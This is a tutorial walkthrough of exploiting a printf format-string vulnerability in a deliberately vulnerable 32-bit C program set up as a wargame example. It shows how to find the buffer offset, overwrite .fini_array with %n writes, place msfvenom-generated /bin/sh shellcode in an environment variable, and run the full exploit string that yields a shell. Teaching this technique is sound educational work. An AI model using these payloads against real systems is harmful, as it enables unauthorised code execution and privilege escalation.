The format string passed to printf controls how printf walks its variadic arguments on the stack, reading from them and, with %n, writing through them. If the format string is attacker-controlled, it can be used to exploit the application in various ways; specifically, an attacker can read and write arbitrary memory.

Reading memory can be accomplished with the usual conversion specifiers (%x, %p, %s), and the positional-argument syntax %<x>$ (a POSIX extension to ISO C that glibc supports) lets you jump to an arbitrary argument position on the stack, in word-sized steps. The %n specifier lets you write to memory: the value at that position on the stack is taken as an int *, and the number of characters output so far is written to that address. So we can write a chosen value by first outputting exactly that many characters.

I’ll discuss exploitation with a simple example, as you might see in a wargame.

Basic steps:

  1. Figure out where your buffer is on the stack.
  2. Figure out where you want to write.
  3. Figure out what you want to write.
  4. Put the exploit together.

Here’s the sample vulnerable program we’ll use. For this simple case, I’ve built it as a 32-bit x86 binary with an executable stack, on a system with ASLR disabled.

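#include <stdio.h>
#include <string.h>

#define BUF_SIZE 1024

int main(int argc, char **argv) {
    char buf[BUF_SIZE];
    if(argc < 2) return 1;

    strncpy(buf, argv[1], BUF_SIZE-1);
    buf[BUF_SIZE-1] = '\0';  /* strncpy does not terminate long inputs */
    printf(buf);             /* the bug: user input used as the format string */

    return 0;
}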

Let’s figure out where our buffer is on the stack, relative to printf’s arguments. It’s easy enough to do: supply something like AAAA%<x>$p, where <x> is an argument position starting from 1 and going up (single-quote it so the shell doesn’t expand $p). When you see ‘AAAA0x41414141’ as your output, %<x>$p has landed on the first word of your buffer. In this case, the buffer is 6 words up the stack, so %6$p reaches it.

So, since we can write to memory, where do we want to write? We need something that will be executed after the printf, which severely limits our options. The first option that comes to mind is to overwrite the saved EIP, but most likely we don’t know the exact address where that’s saved, and the stack can shift around quite easily (due to argument lengths, environment variables, etc.). What about something more fixed?

Linux ELF binaries contain a section known as .fini_array, which the ELF specification defines as “an array of function pointers that contributes to a single termination array for the executable or shared object containing the section.” In a simple binary like this, the section contains only a single function pointer, but that’s fine: we only need one, and we can overwrite it to point to our shellcode. Since main returns right after calling printf, and the .fini_array entries are called during normal process exit, we don’t have long to wait. (This relies on the binary being linked without RELRO; with RELRO, the linker places .fini_array in a region that is made read-only at startup.) With objdump -h, we can see the section headers and find our section:

$ objdump -h printf
 19 .fini_array   00000004  080495b0  080495b0  000005b0  2**2
                  CONTENTS, ALLOC, LOAD, DATA

As expected, it’s 4 bytes long, and located at 0x080495b0, so now we have our address to overwrite.

So what do we want to write there? Clearly the address of our shellcode. We could write our shellcode to the printf buffer, but we’d need to get that address just right, or perhaps include a large NOP sled. My favorite trick is to store the shellcode in an environment variable. As long as you don’t change the environment, its address is easy to predict by writing a small program that prints it, and, if you don’t feel like writing your own shellcode, msfvenom will provide you with a convenient shellcode in bash form: msfvenom -p linux/x86/exec CMD=/bin/sh -f bash -b '\x00'.

So, stick your shellcode into an environment variable and get its address. As long as the environment (and the length of the program’s path) doesn’t change, that address will remain constant for programs invoked from that shell. In my case, I got 0xffffdef2. Writing that with a single %n would mean printing over four billion characters, more than printf’s int character count can hold, so I’ll split it into two 16-bit writes. The catch is that %n always writes a full int (32 bits; the %hn variant would write only 16), so we have to order the writes carefully to avoid overwriting ourselves!

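Writing from the lower address to the higher one works (we’re on a little-endian system, remember!): we write 0xdef2 to the lower address, then 0xffff to the address two bytes above it. The second write replaces the two zero bytes the first one left above 0xdef2, and its own two zero bytes land just past the 4-byte pointer. Conveniently, 0xffff is also larger than 0xdef2, which matters because the character count can only grow. Let’s start constructing our format string. First come both addresses, the target and the one two bytes past it; those 8 bytes are already output by the time printf reaches a conversion, so we output our first value minus 8 characters, write it with %6$n, then pad up to the second value and write it with %7$n.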

The general format at this point is: <destination address><destination address + 2>%<0xdef2 - 8>c%6$n%<0xffff-0xdef2>c%7$n

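Putting it together (0xdef2 - 8 = 57066 and 0xffff - 0xdef2 = 8461), a screenful of padding scrolls by and we land in a shell:

$ ./printf $'\xb0\x95\x04\x08\xb2\x95\x04\x08%57066c%6$n%8461c%7$n'
sh$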